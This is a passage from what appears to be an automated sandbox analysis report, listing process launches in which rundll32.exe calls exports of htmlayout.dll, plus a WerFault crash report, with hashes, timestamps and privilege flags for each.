Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high

Target ID:	6
Start time:	22:24:12
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandler
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high

Target ID:	17
Start time:	22:24:33
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElement
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high

Target ID:	18
Start time:	22:24:33
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSS
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high

Target ID:	19
Start time:	22:24:33
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandler
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Target ID:	20
Start time:	22:24:34
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerEx
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Target ID:	21
Start time:	22:24:34
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethod
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Target ID:	22
Start time:	22:24:36
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756
Imagebase:	0x1080000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Target ID:	23
Start time:	22:24:39
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	24
Start time:	22:24:50
Start date:	04/12/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language